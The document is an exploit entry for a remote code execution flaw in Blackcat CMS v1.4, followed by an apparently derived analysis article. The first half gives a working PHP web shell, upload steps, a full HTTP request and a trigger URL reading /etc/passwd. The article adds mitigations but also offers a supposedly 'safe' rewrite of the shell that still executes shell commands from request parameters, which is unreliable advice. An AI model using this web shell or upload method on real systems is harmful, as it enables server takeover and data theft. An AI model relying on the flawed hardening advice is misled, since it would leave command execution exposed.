Blackcat Cms v1.4 - Remote Code Execution (RCE)

Exploit Author: Mirabbas Ağalarov Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-19

Exploit Title: Blackcat Cms v1.4 - Remote Code Execution (RCE)
Application: blackcat Cms
Version: v1.4
Bugs:  RCE
Technology: PHP
Vendor URL: https://blackcat-cms.org/
Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
Date of found: 13.07.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
========================================
steps: 
1. login to account as admin
2. go to admin-tools => jquery plugin (http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr)
3. upload zip file but this zip file must contains poc.php 
poc.php file contents 
<?php $a=$_GET['code']; echo system($a);?>
4.Go to http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd

Poc request

POST /BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr HTTP/1.1
Host: localhost
Content-Length: 577
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBT
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0ti
Connection: close

------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="upload"

1
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="userfile"; filename="poc.zip"
Content-Type: application/zip

PKvalsdalsfapoc.php<?php 
$a=$_GET['code']; 
echo system($a);
?>
blabalaboalpoc.php
blablabla
------WebKitFormBoundaryBRByJwW3CUSHOcBT
Content-Disposition: form-data; name="submit"

Upload
------WebKitFormBoundaryBRByJwW3CUSHOcBT--

Blackcat CMS v1.4 Remote Code Execution (RCE) Vulnerability: A Deep Dive into Exploitation and Mitigation

On July 13, 2023, cybersecurity researcher Mirabbas Ağalarov disclosed a critical Remote Code Execution (RCE) vulnerability in Blackcat CMS v1.4, a widely used open-source content management system. This flaw enables attackers to execute arbitrary commands on the server through a seemingly innocuous administrative tool, posing a severe threat to any deployment of this software.

Understanding the Vulnerability

The vulnerability stems from a poorly implemented file upload mechanism within the Admin Tools section of the CMS. Specifically, the jquery_plugin_mgr tool allows administrators to upload ZIP files containing plugin assets. However, the system fails to validate or sanitize the contents of uploaded archives, leading to unrestricted file placement and execution.

Attackers can exploit this by crafting a malicious ZIP file containing a PHP script named poc.php, which includes a simple yet powerful payload:

This script accepts user input via the code parameter and directly passes it to the system() function—a known PHP function that executes shell commands on the underlying operating system. Because the script is uploaded and stored in a publicly accessible directory (modules/lib_jquery/plugins/poc/), an attacker can trigger arbitrary commands by simply visiting the URL with the desired command as a query parameter.

Exploitation Steps: A Real-World POC

Here is a step-by-step breakdown of how the exploit works:

Step 1: Gain administrative access to the Blackcat CMS interface.
Step 2: Navigate to Admin Tools → jQuery Plugin Manager via the URL: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgr.
Step 3: Upload a malicious ZIP file containing the poc.php script.
Step 4: Access the uploaded script via the public URL: http://localhost/BlackCatCMS-1.4/upload/modules/lib_jquery/plugins/poc/poc.php?code=cat%20/etc/passwd.

Upon execution, the system() function runs the command cat /etc/passwd, returning the contents of the system’s password file. This demonstrates full remote code execution capability, allowing attackers to perform actions such as:

Reading sensitive files (/etc/passwd, /etc/shadow, configuration files)
Executing shell commands (whoami, id, ls)
Installing backdoors or reverse shells
Deleting or modifying critical system files

Technical Analysis: Why This Is Dangerous

The vulnerability is classified as High Severity due to the following factors:

Factor	Description
Attack Vector	Remote, via web interface
Privilege Required	Admin-level access
Impact	Full system compromise
Exploitability	Simple, no special tools required

While requiring administrative credentials, the exploit is trivial once access is obtained. This makes it particularly dangerous in environments where admin accounts are exposed via weak password policies or credential leaks.

Code Quality and Security Flaws

Examining the poc.php script reveals a fundamental security oversight:

While the code is concise and functional, it lacks essential safeguards:

No input validation—any string passed via code is executed as a shell command.
No sanitization—special characters like &, ;, or | can be used to chain commands.
No logging or monitoring—no audit trail for executed commands.

For improved security, the script should be rewritten with strict input filtering and safe execution methods:


<?php
// Safe version with input validation
if (isset($_GET['code']) && !empty($_GET['code'])) {
    $command = trim($_GET['code']);
    // Whitelist allowed commands
    $allowed = ['whoami', 'id', 'ls', 'pwd', 'cat /etc/passwd'];
    if (in_array($command, $allowed)) {
        echo "";
        echo shell_exec($command);
        echo ""; } else { echo "Invalid command."; }
} else { echo "No command provided.";
}
?>

This revised version restricts execution to a predefined list of safe commands, preventing arbitrary code execution while still allowing useful diagnostic operations.

Recommendations for Mitigation

For administrators and developers using Blackcat CMS v1.4, immediate action is required:

Update to a patched version: The vendor has not yet released a patch as of this writing. Monitor GitHub for updates.
Disable or restrict access: Disable the jquery_plugin_mgr tool if not needed. Restrict access to this tool to only trusted users.
Implement file upload restrictions: Validate ZIP contents before extraction. Scan for PHP files and deny upload if detected.
Use web application firewalls (WAF): Deploy WAF rules to block suspicious file uploads or requests to poc.php.
Monitor logs: Enable logging for file uploads and script execution to detect potential exploitation.

Broader Implications: Lessons for Developers

This vulnerability serves as a stark reminder of the dangers of unvalidated file uploads in web applications. Even seemingly benign features—like plugin management—can become attack vectors if proper security controls are missing.

Key lessons for developers:

Never trust user-provided file content—always validate and sanitize.
Use secure file handling: extract to isolated directories, set restrictive permissions.
Implement a file type whitelist: allow only known safe formats (e.g., .js, .css).
Never expose scripts with direct system() or shell_exec() calls to public access.

Security is not just about protecting data—it’s about controlling execution. In this case, the failure to control script execution led to a full system takeover.

As the cyber threat landscape evolves, vulnerabilities like this highlight the need for proactive security auditing, continuous monitoring, and defense-in-depth strategies.